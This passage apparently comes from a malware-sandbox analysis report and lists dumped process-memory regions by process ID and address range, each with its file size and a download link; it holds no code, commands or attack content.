memory/1216-131-0x0000027D378D0000-0x0000027D378FB000-memory.dmp

Filesize
172KB

Download
memory/1216-132-0x00007FFA3C9B0000-0x00007FFA3C9C0000-memory.dmp

Filesize
64KB

Download
memory/1332-524-0x0000000004990000-0x0000000004CE4000-memory.dmp

Filesize
3.3MB

Download
memory/1332-932-0x0000000006F80000-0x0000000007524000-memory.dmp

Filesize
5.6MB

Download
memory/1332-514-0x0000000004170000-0x00000000041D6000-memory.dmp

Filesize
408KB

Download
memory/1332-482-0x0000000003A20000-0x0000000003A56000-memory.dmp

Filesize
216KB

Download
memory/1332-930-0x0000000006280000-0x0000000006316000-memory.dmp

Filesize
600KB

Download
memory/1332-695-0x0000000004FE0000-0x0000000004FFE000-memory.dmp

Filesize
120KB

Download
memory/1332-698-0x0000000005570000-0x00000000055BC000-memory.dmp

Filesize
304KB

Download
memory/1332-928-0x0000000006900000-0x0000000006F7A000-memory.dmp

Filesize
6.5MB

Download
memory/1332-498-0x0000000003EF0000-0x0000000003F12000-memory.dmp

Filesize
136KB

Download
memory/1332-929-0x0000000005490000-0x00000000054AA000-memory.dmp

Filesize
104KB

Download
memory/1332-513-0x0000000004090000-0x00000000040F6000-memory.dmp

Filesize
408KB

Download
memory/1332-931-0x0000000005F80000-0x0000000005FA2000-memory.dmp

Filesize
136KB

Download
memory/1332-486-0x00000000041E0000-0x0000000004808000-memory.dmp

Filesize
6.2MB

Download
memory/2244-534-0x000002A228A50000-0x000002A228A90000-memory.dmp

Filesize
256KB

Download
memory/2404-483-0x000001C51A450000-0x000001C51A458000-memory.dmp

Filesize
32KB

Download
memory/2404-481-0x000001C51A490000-0x000001C51A4AA000-memory.dmp

Filesize
104KB

Download
memory/2404-484-0x000001C51A460000-0x000001C51A466000-memory.dmp

Filesize
24KB

Download
memory/2404-485-0x000001C51A4B0000-0x000001C51A4BA000-memory.dmp

Filesize
40KB

Download
memory/2404-475-0x000001C51A220000-0x000001C51A22A000-memory.dmp

Filesize
40KB

Download
memory/2404-450-0x000001C51A470000-0x000001C51A48C000-memory.dmp

Filesize
112KB

Download
memory/2404-435-0x000001C51A210000-0x000001C51A21A000-memory.dmp

Filesize
40KB

Download
memory/2404-409-0x000001C51A250000-0x000001C51A305000-memory.dmp

Filesize
724KB

Download
memory/2404-404-0x000001C51A230000-0x000001C51A24C000-memory.dmp

Filesize
112KB

Download
memory/2528-47-0x000001BE336D0000-0x000001BE336F2000-memory.dmp

Filesize
136KB

Download
memory/3708-41-0x00007FF7FF8B0000-0x00007FF7FFB16000-memory.dmp

Filesize
2.4MB

Download
memory/4256-78-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4256-81-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4256-82-0x00007FFA7C930000-0x00007FFA7CB25000-memory.dmp

Filesize
2.0MB

Download
memory/4256-83-0x00007FFA7AA50000-0x00007FFA7AB0E000-memory.dmp

Filesize
760KB

Download
memory/4256-79-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4256-77-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4256-76-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4256-87-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/4688-40-0x000000001BD10000-0x000000001BDC2000-memory.dmp

Filesize
712KB

Download
memory/4688-39-0x000000001BC00000-0x000000001BC50000-memory.dmp

Filesize
320KB

Download